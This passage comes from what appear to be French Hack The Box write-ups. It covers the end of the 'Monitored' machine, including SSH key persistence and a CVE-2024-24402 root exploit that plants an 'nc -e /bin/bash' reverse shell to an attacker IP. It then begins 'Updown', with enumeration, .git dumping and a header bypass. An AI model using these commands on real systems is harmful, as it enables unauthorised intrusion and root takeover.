class="nv">TERM</span><span class="o">=</span>xterm </span></span><span class="line"><span class="cl">nagios@monitored:/home/nagios$ ^Z </span></span><span class="line"><span class="cl"><span class="o">[</span>1<span class="o">]</span> + <span class="m">68520</span> suspended nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl">$ stty raw -echo<span class="p">;</span><span class="nb">fg</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>1<span class="o">]</span> + <span class="m">68520</span> continued nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl">nagios@monitored:/home/nagios$ whoami </span></span><span class="line"><span class="cl">nagios </span></span><span class="line"><span class="cl">nagios@monitored:/home/nagios$ ls </span></span><span class="line"><span class="cl">cookie.txt shell user.txt </span></span><span class="line"><span class="cl">nagios@monitored:/home/nagios$ cat user.txt </span></span><span class="line"><span class="cl">213b4331f50e5f1072d301938db28331 </span></span></code></pre></td></tr></table> </div> </div><h3 id="ssh-to-nagios">SSH to nagios </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">nagios@monitored:/home/nagios$ <span class="nb">cd</span> .ssh </span></span><span class="line"><span class="cl">nagios@monitored:/home/nagios/.ssh$ ssh-keygen -t rsa </span></span><span class="line"><span class="cl">Generating public/private rsa key pair. </span></span><span class="line"><span class="cl">Enter file in which to save the key <span class="o">(</span>/home/nagios/.ssh/id_rsa<span class="o">)</span>: </span></span><span class="line"><span class="cl">Enter passphrase <span class="o">(</span>empty <span class="k">for</span> no passphrase<span class="o">)</span>: </span></span><span class="line"><span class="cl">Enter same passphrase again: </span></span><span class="line"><span class="cl">Your identification has been saved in /home/nagios/.ssh/id_rsa </span></span><span class="line"><span class="cl">Your public key has been saved in /home/nagios/.ssh/id_rsa.pub </span></span><span class="line"><span class="cl">The key fingerprint is: </span></span><span class="line"><span class="cl">SHA256:2NBZpIJ+HjRmFS93s8DRbV8sAp4rqh+3kPsTvXVzki0 nagios@monitored </span></span><span class="line"><span class="cl">The key s randomart image is: </span></span><span class="line"><span class="cl">+---<span class="o">[</span>RSA 3072<span class="o">]</span>----+ </span></span><span class="line"><span class="cl">...... </span></span><span class="line"><span class="cl">+----<span class="o">[</span>SHA256<span class="o">]</span>-----+ </span></span><span class="line"><span class="cl">nagios@monitored:/home/nagios/.ssh$ cat id_rsa.pub </span></span><span class="line"><span class="cl">ssh-rsa AAAAB3NzaC....id8HqID90SBHsANCYUhofRFH5rCG3alGvYyYNMu+Wk<span class="o">=</span> nagios@monitored </span></span><span class="line"><span class="cl">nagios@monitored:/home/nagios/.ssh$ mv id_rsa.pub authorized_keys </span></span><span class="line"><span class="cl">nagios@monitored:/home/nagios/.ssh$ ls </span></span><span class="line"><span class="cl">authorized_keys id_rsa </span></span><span class="line"><span class="cl">nagios@monitored:/home/nagios/.ssh$ cat id_rsa </span></span><span class="line"><span class="cl">-----BEGIN OPENSSH PRIVATE KEY----- </span></span><span class="line"><span class="cl">b3BlbnNzaC1rZXktdjEAAAAABG5v.......c0Btb25pdG9yZWQBAg<span class="o">==</span> </span></span><span class="line"><span class="cl">-----END OPENSSH PRIVATE KEY----- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">-------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># Copy the id_rsa to my machine and connect to nagios using SSH</span> </span></span><span class="line"><span class="cl">$ vim nagios.key </span></span><span class="line"><span class="cl">$ chmod <span class="m">600</span> nagios.key </span></span><span class="line"><span class="cl">$ ssh nagios@10.10.11.248 -i nagios.key </span></span><span class="line"><span class="cl">Linux monitored 5.10.0-28-amd64 <span class="c1">#1 SMP Debian 5.10.209-2 (2024-01-31) x86_64</span> </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">Last login: Wed Mar <span class="m">27</span> 10:32:47 <span class="m">2024</span> from 10.10.14.23 </span></span><span class="line"><span class="cl">nagios@monitored:~$ whoami </span></span><span class="line"><span class="cl">nagios </span></span><span class="line"><span class="cl">nagios@monitored:~$ cat user.txt </span></span><span class="line"><span class="cl">213b....8331 </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="cve-2024-24402">CVE-2024-24402 </h3><p>Je lance une recherche sur google :</p> <ul> <li>&ldquo;exploit nagiosxi script as root&rdquo; ce qui m&rsquo;amène vers ce lien :</li> <li><a class="link" href="https://gist.github.com/sec-fortress/6d128a5e290e873be4c2ca27b6579eca" target="_blank" rel="noopener" >https://gist.github.com/sec-fortress/6d128a5e290e873be4c2ca27b6579eca</a></li> </ul> <p>ou encore la recherche :</p> <ul> <li>&ldquo;cve nagioxi priv esc&rdquo; qui m&rsquo;amène vers ce lien, expliquant la même CVE :</li> <li><a class="link" href="https://github.com/MAWK0235/CVE-2024-24402" target="_blank" rel="noopener" >https://github.com/MAWK0235/CVE-2024-24402</a></li> </ul> <p>En faisant sudo -l, on se rend compte qu&rsquo;on peut executer beaucoup de binaires en tant que <strong>root</strong> avec sudo. En regardant de plus près les scripts, il ne s&rsquo;agit que de scripts de <strong>nagiosxi</strong> qui n&rsquo;ont pas subis de modification.</p> <p>Ce qui veut signifie que s&rsquo;il existe un moyen d&rsquo;exploiter ces binaires, il existe probablement une <strong>CVE</strong> sur internet. Et si ne n&rsquo;est pas le cas, ils ne sont pas surement pas exploitables.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">nagios@monitored:~$ sudo -l </span></span><span class="line"><span class="cl">Matching Defaults entries <span class="k">for</span> nagios on localhost: </span></span><span class="line"><span class="cl"> env_reset, mail_badpass, <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">User nagios may run the following commands on localhost: </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /etc/init.d/nagios start </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /etc/init.d/nagios stop </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /etc/init.d/nagios restart </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /etc/init.d/nagios reload </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /etc/init.d/nagios status </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /etc/init.d/nagios checkconfig </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /etc/init.d/npcd start </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /etc/init.d/npcd stop </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /etc/init.d/npcd restart </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /etc/init.d/npcd reload </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /etc/init.d/npcd status </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php * </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/send_to_nls.php * </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/migrate/migrate.php * </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /usr/local/nagiosxi/scripts/components/getprofile.sh </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /usr/local/nagiosxi/scripts/upgrade_to_latest.sh </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /usr/local/nagiosxi/scripts/change_timezone.sh </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /usr/local/nagiosxi/scripts/manage_services.sh * </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /usr/local/nagiosxi/scripts/reset_config_perms.sh </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /usr/local/nagiosxi/scripts/manage_ssl_config.sh * </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /usr/local/nagiosxi/scripts/backup_xi.sh * </span></span></code></pre></td></tr></table> </div> </div><p>Voici ce que contient le fichier executable nous permettant d&rsquo;exploiter <code>/usr/local/nagiosxi/scripts/manage_services.sh</code> pour devenir root :<br> <code>exploit.sh </code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="cp">#!/bin/bash </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># Create npcd script</span> </span></span><span class="line"><span class="cl"><span class="nb">echo</span> <span class="s2">&#34;#!/bin/bash&#34;</span> &gt; /tmp/npcd </span></span><span class="line"><span class="cl"><span class="nb">echo</span> <span class="s2">&#34;nc -e /bin/bash 10.10.14.14 4445&#34;</span> &gt;&gt; /tmp/npcd </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># Grant executable permissions on the npcd script</span> </span></span><span class="line"><span class="cl">chmod +x /tmp/npcd 2&gt;/dev/null </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># Stop the npcd service</span> </span></span><span class="line"><span class="cl">sudo /usr/local/nagiosxi/scripts/manage_services.sh stop npcd </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># Replace original npcd script</span> </span></span><span class="line"><span class="cl">cp /tmp/npcd /usr/local/nagios/bin/npcd 2&gt;/dev/null </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nb">echo</span> <span class="s2">&#34;[+] Start Up your listener&#34;</span> </span></span><span class="line"><span class="cl">sleep <span class="m">1</span> </span></span><span class="line"><span class="cl"><span class="nb">echo</span> <span class="s2">&#34;[+] nc -lvnp 4445&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">sleep <span class="m">15</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nb">echo</span> <span class="s2">&#34;[+] Expect your shellzz xD&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># start service to recieve reverse shell</span> </span></span><span class="line"><span class="cl">sudo /usr/local/nagiosxi/scripts/manage_services.sh start npcd </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">sleep <span class="m">5</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nb">echo</span> <span class="s2">&#34;[+] done&#34;</span> </span></span></code></pre></td></tr></table> </div> </div><p>Il faut donc remplacer le binaire <strong>ntpd</strong> par un faux contenant un reverse shell, puis redemarrer le service en utilisant le script <strong>manage_services.sh</strong> avec <strong>sudo</strong>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">nagios@monitored:~$ ./exploit.sh </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Start Up your listener </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> nc -lvnp <span class="m">4445</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Expect your shellzz xD </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> <span class="k">done</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">nc -lnvp <span class="m">4445</span> </span></span><span class="line"><span class="cl">Ncat: Version 7.93 <span class="o">(</span> https://nmap.org/ncat <span class="o">)</span> </span></span><span class="line"><span class="cl">Ncat: Listening on :::4445 </span></span><span class="line"><span class="cl">Ncat: Listening on 0.0.0.0:4445 </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.11.248. </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.11.248:40642. </span></span><span class="line"><span class="cl">whoami </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl"><span class="nb">cd</span> /root </span></span><span class="line"><span class="cl">cat root.txt </span></span><span class="line"><span class="cl">cf92....0a0a </span></span></code></pre></td></tr></table> </div> </div>HTB | Updownhttps://leopoldabgn.github.io/writeups/p/updown-htb/Thu, 30 Oct 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/updown-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Updown cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Updown</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.11.177</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Medium</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nmap -sC -sV -An -T4 -vvv -p- 10.10.11.177 </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh syn-ack ttl <span class="m">63</span> OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-hostkey: </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">3072</span> 9e1f98d7c8ba61dbf149669d701702e7 <span class="o">(</span>RSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDl7j17X/EWcm1MwzD7sKOFZyTUggWH1RRgwFbAK+B6R28x47OJjQW8VO4tCjTyvqKBzpgg7r98xNEykmvnMr0V9eUhg6zf04GfS/gudDF3Fbr3XnZOsrMmryChQdkMyZQK1HULbqRij1tdHaxbIGbG5CmIxbh69mMwBOlinQINCStytTvZq4btP5xSMd8pyzuZdqw3Z58ORSnJAorhBXAmVa9126OoLx7AzL0aO3lqgWjo/wwd3FmcYxAdOjKFbIRiZK/f7RJHty9P2WhhmZ6mZBSTAvIJ36Kb4Z0NuZ+ztfZCCDEw3z3bVXSVR/cp0Z0186gkZv8w8cp/ZHbtJB/nofzEBEeIK8gZqeFc/hwrySA6yBbSg0FYmXSvUuKgtjTgbZvgog66h+98XUgXheX1YPDcnUU66zcZbGsSM1aw1sMqB1vHhd2LGeY8UeQ1pr+lppDwMgce8DO141tj+ozjJouy19Tkc9BB46FNJ43Jl58CbLPdHUcWeMbjwauMrw0<span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> c21cfe1152e3d7e5f759186b68453f62 <span class="o">(</span>ECDSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKMJ3/md06ho+1RKACqh2T8urLkt1ST6yJ9EXEkuJh0UI/zFcIffzUOeiD2ZHphWyvRDIqm7ikVvNFmigSBUpXI<span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 5f6e12670a66e8e2b761bec4143ad38e <span class="o">(</span>ED25519<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIL1VZrZbtNuK2LKeBBzfz0gywG4oYxgPl+s5QENjani1 </span></span><span class="line"><span class="cl">80/tcp open http syn-ack ttl <span class="m">63</span> Apache httpd 2.4.41 <span class="o">((</span>Ubuntu<span class="o">))</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Is my Website up ? </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Supported Methods: GET HEAD POST OPTIONS </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Apache/2.4.41 <span class="o">(</span>Ubuntu<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="siteisuphtb---port-80">siteisup.htb - Port 80 </h3><h3 id="subdomain-devsiteisuphtb">Subdomain dev.siteisup.htb </h3><p>On trouve une sous-domaine, mais aucune page ne semble accessible (&ldquo;forbidden&rdquo;).</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">gobuster vhost -u <span class="s2">&#34;siteisup.htb&#34;</span> -w <span class="sb">`</span>fzf-wordlists<span class="sb">`</span> --append-domain </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl">Gobuster v3.6 </span></span><span class="line"><span class="cl">by OJ Reeves <span class="o">(</span>@TheColonial<span class="o">)</span> <span class="p">&amp;</span> Christian Mehlmauer <span class="o">(</span>@firefart<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Url: http://siteisup.htb </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Method: GET </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Threads: <span class="m">10</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Wordlist: /opt/lists/seclists/Discovery/DNS/subdomains-top1million-110000.txt </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> User Agent: gobuster/3.6 </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Timeout: 10s </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Append Domain: <span class="nb">true</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl">Starting gobuster in VHOST enumeration <span class="nv">mode</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl">Found: dev.siteisup.htb Status: <span class="m">403</span> <span class="o">[</span>Size: 281<span class="o">]</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="devgit---git-dumper">dev/.git - git-dumper </h3><p>On trouve une dossier dev/.git :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">dirsearch -u http://siteisup.htb/dev </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> _<span class="p">|</span>. _ _ _ _ _ _<span class="p">|</span>_ v0.4.3 </span></span><span class="line"><span class="cl"> <span class="o">(</span>_<span class="o">||</span><span class="p">|</span> _<span class="o">)</span> <span class="o">(</span>/_<span class="o">(</span>_<span class="o">||</span> <span class="o">(</span>_<span class="p">|</span> <span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Extensions: php, asp, aspx, jsp, html, htm <span class="p">|</span> HTTP method: GET <span class="p">|</span> Threads: <span class="m">25</span> <span class="p">|</span> Wordlist size: <span class="m">12289</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Target: http://siteisup.htb/ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>00:47:20<span class="o">]</span> Scanning: dev/ </span></span><span class="line"><span class="cl"><span class="o">[</span>00:47:22<span class="o">]</span> <span class="m">301</span> - 315B - /dev/.git -&gt; http://siteisup.htb/dev/.git/ </span></span><span class="line"><span class="cl"><span class="o">[</span>00:47:22<span class="o">]</span> <span class="m">200</span> - 3KB - /dev/.git/ </span></span><span class="line"><span class="cl"><span class="o">[</span>00:47:22<span class="o">]</span> <span class="m">200</span> - 772B - /dev/.git/branches/ </span></span><span class="line"><span class="cl"><span class="o">[</span>00:47:22<span class="o">]</span> <span class="m">200</span> - 298B - /dev/.git/config </span></span><span class="line"><span class="cl"><span class="o">[</span>00:47:22<span class="o">]</span> <span class="m">200</span> - 73B - /dev/.git/description </span></span><span class="line"><span class="cl">... </span></span></code></pre></td></tr></table> </div> </div><p>Dans le .git, on trouve un fichier .htaccess nous indiquant qu&rsquo;un header spécifique permettrait de débloquer l&rsquo;accès à certaines pages.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ git-dumper http://siteisup.htb/dev/ ./git-dump </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">$ <span class="nb">cd</span> git-dump </span></span><span class="line"><span class="cl">$ cat .htaccess </span></span><span class="line"><span class="cl">SetEnvIfNoCase Special-Dev <span class="s2">&#34;only4dev&#34;</span> Required-Header </span></span><span class="line"><span class="cl">Order Deny,Allow </span></span><span class="line"><span class="cl">Deny from All </span></span><span class="line"><span class="cl">Allow from <span class="nv">env</span><span class="o">=</span>Required-Header </span></span></code></pre></td></tr></table> </div> </div><p>En essayant d&rsquo;accéder à <strong>dev.siteisup.htb</strong> en ajoutant le header, on obtient l&rsquo;accès à ce vhost !</p> <h3 id="checkerphp">checker.php </h3><p>On trouve un fichier changelog.txt indiquant qu&rsquo;une option nous permettant d&rsquo;upload des fichiers existe. <code>changelog.txt</code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">cat changelog.txt </span></span><span class="line"><span class="cl">Beta version </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">1- Check a bunch of websites. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">-- ToDo: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">1- Multithreading <span class="k">for</span> a faster version :D. </span></span><span class="line"><span class="cl">2- Remove the upload option. </span></span><span class="line"><span class="cl">3- New admin panel. </span></span></code></pre></td></tr></table> </div> </div><p>En analysant la page disponible sur dev.siteisup.htb et le fichier <strong>checker.php</strong> récupérer dans le .git, on comprend qu&rsquo;il s&rsquo;agit bien de la meme page.</p> <p>Cette page semble contenir une vulnérabilité de type File Upload, nous permettant eventuellement d&rsquo;executer du code PHP.</p> <h3 id="file-upload---php-rce">File Upload - PHP RCE </h3><p>La requete suivante permet d&rsquo;uploader un fichier PHP avec l&rsquo;extension <strong>.phar</strong>, qui sera executé correctement comme du php :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 